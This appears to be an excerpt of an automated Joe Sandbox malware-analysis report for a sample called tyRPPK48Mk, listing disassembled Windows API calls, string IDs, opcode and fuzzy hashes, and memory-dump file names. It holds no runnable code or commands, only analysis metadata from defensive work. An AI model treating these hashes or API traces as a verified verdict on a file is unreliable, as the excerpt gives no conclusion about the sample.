                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 262282135-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3771399671-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1603158881
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateMenu.USER32 ref: 00448603
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0
• API String ID: 161812096-4108050209
• Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
• Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
• Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
• Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
• Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
• Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• lstrcmpiW.KERNEL32(?,?), ref: 00453900
• MoveFileW.KERNEL32(?,?), ref: 00453932
Similarity
• API ID: File$AttributesFullMoveNamePathlstrcmpi
• String ID:
• API String ID: 978794511-0
• Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
• Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
• Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00445ECB
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2441338619-1568723262
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @COM_EVENTOBJ
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 327565842-2228938565
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                                                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
